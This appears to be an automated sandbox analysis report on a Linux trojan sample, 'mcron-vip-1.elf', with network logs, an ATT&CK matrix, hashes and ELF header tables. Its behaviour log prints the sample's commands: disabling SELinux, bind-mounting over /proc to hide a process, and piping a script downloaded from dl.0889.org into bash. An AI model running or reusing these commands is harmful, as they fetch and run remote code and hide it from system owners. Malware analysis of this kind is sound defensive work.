Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:10:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:10:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:11:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:11:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:12:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:12:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:13:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:13:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443
Source: mcron-vip-1.elfELF static info symbol of initial sample: _Z11hideProcessi
Source: mcron-vip-1.elfELF static info symbol of initial sample: _Z14executeCommandPKc
Source: classification engineClassification label: mal52.evad.linELF@0/1@22/0
Source: /tmp/mcron-vip-1.elf (PID: 5489); File: /var/tmp/.cron
Source: /tmp/mcron-vip-1.elf (PID: 5489); Directory: /tmp/.c
Source: /usr/bin/curl (PID: 5518); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5585); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5619); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5659); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5694); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5728); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5761); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5794); Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5827); Directory: /root/.curlrc
Source: /tmp/mcron-vip-1.elf (PID: 5490); Shell command executed: sh -c "setenforce 0 &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5492); Shell command executed: sh -c "mount --bind /tmp/.c /proc/5489"
Source: /tmp/mcron-vip-1.elf (PID: 5504); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5582); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5616); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5656); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5691); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5725); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5758); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5791); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /tmp/mcron-vip-1.elf (PID: 5824); Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
Source: /bin/sh (PID: 5518); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5585); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5619); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5659); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5694); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5728); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5761); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5794); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5827); Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5516); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5583); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5617); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5657); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5692); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5726); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5759); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5792); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5825); Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: ELF symbol in initial sample; Symbol name: sleep
Source: /tmp/mcron-vip-1.elf (PID: 5489); Sleeps longer then 60s: 60.0s
Source: /tmp/mcron-vip-1.elf (PID: 5489); Sleeps longer then 60s: 60.0s
Source: /usr/bin/curl (PID: 5518); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5516); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5517); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5585); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5583); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5584); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5619); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5617); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5618); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5659); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5657); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5658); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5694); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5692); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5693); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5728); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5726); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5727); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5761); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5759); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5760); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5794); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5792); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5793); Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 5827); Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 5825); Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 5826); Queries kernel information via 'uname':

Anti Debugging

Source: /tmp/mcron-vip-1.elf (PID: 5492); Process with PPID: /bin/sh -> sh -c "mount --bind /tmp/.c /proc/5489"
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 2 Scripting | Valid Accounts | Windows Management Instrumentation | 2 Scripting | Path Interception | 11 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Hidden Files and Directories | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 14 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
No configs have been found
Behavior graph (image not reproduced). ID: 1547393; Sample: mcron-vip-1.elf; Startdate: 02/11/2024; Architecture: LINUX; Score: 52

Source | Detection | Scanner | Label | Link
mcron-vip-1.elf | 34% | ReversingLabs | Linux.Trojan.Generic |
No Antivirus matches
No Antivirus matches
No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.24 | true | false |  | unknown
dl.0889.org | 20.56.16.3 | true | false |  | unknown

Name | Malicious | Antivirus Detection | Reputation
http://dl.0889.org/vip-1.sh | false |  | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
20.56.16.3 | dl.0889.org | United States |  | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
185.125.190.26 | unknown | United Kingdom |  | 41231 | CANONICAL-ASGB | false
                            Process:/tmp/mcron-vip-1.elf
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):2.0
                            Encrypted:false
                            SSDEEP:3:Een:Ee
                            MD5:D902C3CE47124C66CE615D5AD9BA304F
                            SHA1:D49784030FF04923C480AC7A800B03FEDD67D329
                            SHA-256:C363831CBFEE684FA8A7D96B58CF42F5174EA935BC3B751FFF18C237D34D0366
                            SHA-512:9FD43824ED57DB5FDCB286C5DF1C540858CA87ACD203FB7217725A7E8CBC0A9E4FAF70A48DAD7A0B4667924810F2CC395501208960DDB60F9BBBEC016FE9BB39
                            Malicious:false
                            Reputation:low
                            Preview:5489
                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=ff5ce0b545d2268f129d29f18aa5167a376a6925, not stripped
                            Entropy (8bit):4.271964786810613
                            TrID:
                            • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                            • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                            • Lumena CEL bitmap (63/63) 0.78%
                            File name:mcron-vip-1.elf
                            File size:13'016 bytes
                            MD5:4e9526bcce8ad234b516a6cf30a4acc9
                            SHA1:da42a05843d9662a2ee992d52d2c00fd048ae723
                            SHA256:de490d56cb9a511e4510160281fce2e3a6d9a3596ad7873b9dd7cfd61e52ae3d
                            SHA512:645297ffbb3f5aa852958c251aa5cc4c76e194e3415c06591bee9e3656cf83951b4e7e533ce5703ae069e76f6022cf4e92f26e2fe6f8d8e8a1369b53537eb47d
                            SSDEEP:192:GIGhy/P/mud89u0ciEcAwroU9FCPP+Sz4SX6zyBC45nMtze1i:OhQ/mudD00cprNFCPP+Kl6uBCtk1i
                            TLSH:F642730BF682CE7BC8D946341CAF8534A9B394F4DF22531B651461BA79923C80E2FAD5

                            ELF header

                            Class:ELF64
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:Advanced Micro Devices X86-64
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x400d10
                            Flags:0x0
                            ELF Header Size:64
                            Program Header Offset:64
                            Program Header Size:56
                            Number of Program Headers:8
                            Section Header Offset:7184
                            Section Header Size:64
                            Number of Section Headers:30
                            Header String Table Index:27
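Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
 | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
.interp | PROGBITS | 0x400200 | 0x200 | 0x1c | 0x0 | 0x2 | A | 0 | 0 | 1
.note.ABI-tag | NOTE | 0x40021c | 0x21c | 0x20 | 0x0 | 0x2 | A | 0 | 0 | 4
.note.gnu.build-id | NOTE | 0x40023c | 0x23c | 0x24 | 0x0 | 0x2 | A | 0 | 0 | 4
.gnu.hash | GNU_HASH | 0x400260 | 0x260 | 0x38 | 0x0 | 0x2 | A | 5 | 0 | 8
.dynsym | DYNSYM | 0x400298 | 0x298 | 0x318 | 0x18 | 0x2 | A | 6 | 1 | 8
.dynstr | STRTAB | 0x4005b0 | 0x5b0 | 0x1fd | 0x0 | 0x2 | A | 0 | 0 | 1
.gnu.version | VERSYM | 0x4007ae | 0x7ae | 0x42 | 0x2 | 0x2 | A | 5 | 0 | 2
.gnu.version_r | VERNEED | 0x4007f0 | 0x7f0 | 0x50 | 0x0 | 0x2 | A | 6 | 2 | 8
.rela.dyn | RELA | 0x400840 | 0x840 | 0x48 | 0x18 | 0x2 | A | 5 | 0 | 8
.rela.plt | RELA | 0x400888 | 0x888 | 0x2a0 | 0x18 | 0x2 | A | 5 | 12 | 8
.init | PROGBITS | 0x400b28 | 0xb28 | 0x18 | 0x0 | 0x6 | AX | 0 | 0 | 4
.plt | PROGBITS | 0x400b40 | 0xb40 | 0x1d0 | 0x10 | 0x6 | AX | 0 | 0 | 4
.text | PROGBITS | 0x400d10 | 0xd10 | 0x6c8 | 0x0 | 0x6 | AX | 0 | 0 | 16
.fini | PROGBITS | 0x4013d8 | 0x13d8 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 4
.rodata | PROGBITS | 0x4013e8 | 0x13e8 | 0x1f7 | 0x0 | 0x2 | A | 0 | 0 | 8
.eh_frame_hdr | PROGBITS | 0x4015e0 | 0x15e0 | 0x5c | 0x0 | 0x2 | A | 0 | 0 | 4
.eh_frame | PROGBITS | 0x401640 | 0x1640 | 0x18c | 0x0 | 0x2 | A | 0 | 0 | 8
.ctors | PROGBITS | 0x6017d0 | 0x17d0 | 0x18 | 0x0 | 0x3 | WA | 0 | 0 | 8
.dtors | PROGBITS | 0x6017e8 | 0x17e8 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
.jcr | PROGBITS | 0x6017f8 | 0x17f8 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8
.dynamic | DYNAMIC | 0x601800 | 0x1800 | 0x1c0 | 0x10 | 0x3 | WA | 6 | 0 | 8
.got | PROGBITS | 0x6019c0 | 0x19c0 | 0x8 | 0x8 | 0x3 | WA | 0 | 0 | 8
.got.plt | PROGBITS | 0x6019c8 | 0x19c8 | 0xf8 | 0x8 | 0x3 | WA | 0 | 0 | 8
.data | PROGBITS | 0x601ac0 | 0x1ac0 | 0x20 | 0x0 | 0x3 | WA | 0 | 0 | 8
.bss | NOBITS | 0x601ae0 | 0x1ae0 | 0x248 | 0x0 | 0x3 | WA | 0 | 0 | 32
.comment | PROGBITS | 0x0 | 0x1ae0 | 0x2d | 0x1 | 0x30 | MS | 0 | 0 | 1
.shstrtab | STRTAB | 0x0 | 0x1b0d | 0xfe | 0x0 | 0x0 |  | 0 | 0 | 1
.symtab | SYMTAB | 0x0 | 0x2390 | 0x9a8 | 0x18 | 0x0 |  | 29 | 49 | 8
.strtab | STRTAB | 0x0 | 0x2d38 | 0x5a0 | 0x0 | 0x0 |  | 0 | 0 | 1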
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
PHDR | 0x40 | 0x400040 | 0x400040 | 0x1c0 | 0x1c0 | 1.6598 | 0x5 | R E | 0x8 |  |
INTERP | 0x200 | 0x400200 | 0x400200 | 0x1c | 0x1c | 3.9408 | 0x4 | R | 0x1 | /lib64/ld-linux-x86-64.so.2 | .interp
LOAD | 0x0 | 0x400000 | 0x400000 | 0x17cc | 0x17cc | 4.9654 | 0x5 | R E | 0x200000 |  | .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
LOAD | 0x17d0 | 0x6017d0 | 0x6017d0 | 0x310 | 0x558 | 1.9658 | 0x6 | RW | 0x200000 |  | .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
DYNAMIC | 0x1800 | 0x601800 | 0x601800 | 0x1c0 | 0x1c0 | 1.5154 | 0x6 | RW | 0x8 |  | .dynamic
NOTE | 0x21c | 0x40021c | 0x40021c | 0x44 | 0x44 | 3.4924 | 0x4 | R | 0x4 |  | .note.ABI-tag .note.gnu.build-id
GNU_EH_FRAME | 0x15e0 | 0x4015e0 | 0x4015e0 | 0x5c | 0x5c | 3.5718 | 0x4 | R | 0x4 |  | .eh_frame_hdr
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 |  |
Type | Meta | Value | Tag
DT_NEEDED | sharedlib | libstdc++.so.6 | 0x1
DT_NEEDED | sharedlib | libm.so.6 | 0x1
DT_NEEDED | sharedlib | libgcc_s.so.1 | 0x1
DT_NEEDED | sharedlib | libc.so.6 | 0x1
DT_INIT | value | 0x400b28 | 0xc
DT_FINI | value | 0x4013d8 | 0xd
DT_GNU_HASH | value | 0x400260 | 0x6ffffef5
DT_STRTAB | value | 0x4005b0 | 0x5
DT_SYMTAB | value | 0x400298 | 0x6
DT_STRSZ | bytes | 509 | 0xa
DT_SYMENT | bytes | 24 | 0xb
DT_DEBUG | value | 0x0 | 0x15
DT_PLTGOT | value | 0x6019c8 | 0x3
DT_PLTRELSZ | bytes | 672 | 0x2
DT_PLTREL | pltrel | DT_RELA | 0x14
DT_JMPREL | value | 0x400888 | 0x17
DT_RELA | value | 0x400840 | 0x7
DT_RELASZ | bytes | 72 | 0x8
DT_RELAENT | bytes | 24 | 0x9
DT_VERNEED | value | 0x4007f0 | 0x6ffffffe
DT_VERNEEDNUM | value | 2 | 0x6fffffff
DT_VERSYM | value | 0x4007ae | 0x6ffffff0
DT_NULL | value | 0x0 | 0x0
                            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                            .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _Jv_RegisterClasses.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _ZNSolsEPFRSoS_EGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSolsEiGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitC1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x400c000FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZSt4cerrGLIBCXX_3.4libstdc++.so.6.dynsym0x601ae0272OBJECT<unknown>DEFAULT25
                            _ZSt4coutGLIBCXX_3.4libstdc++.so.6.dynsym0x601c00272OBJECT<unknown>DEFAULT25
                            _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_GLIBCXX_3.4libstdc++.so.6.dynsym0x400cc00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKcGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __cxa_atexitGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __errno_locationGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __gxx_personality_v0CXXABI_1.3libstdc++.so.6.dynsym0x400cd00FUNC<unknown>DEFAULTSHN_UNDEF
                            __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            chdirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            closeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            dup2GLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            exitGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            flockGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            forkGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
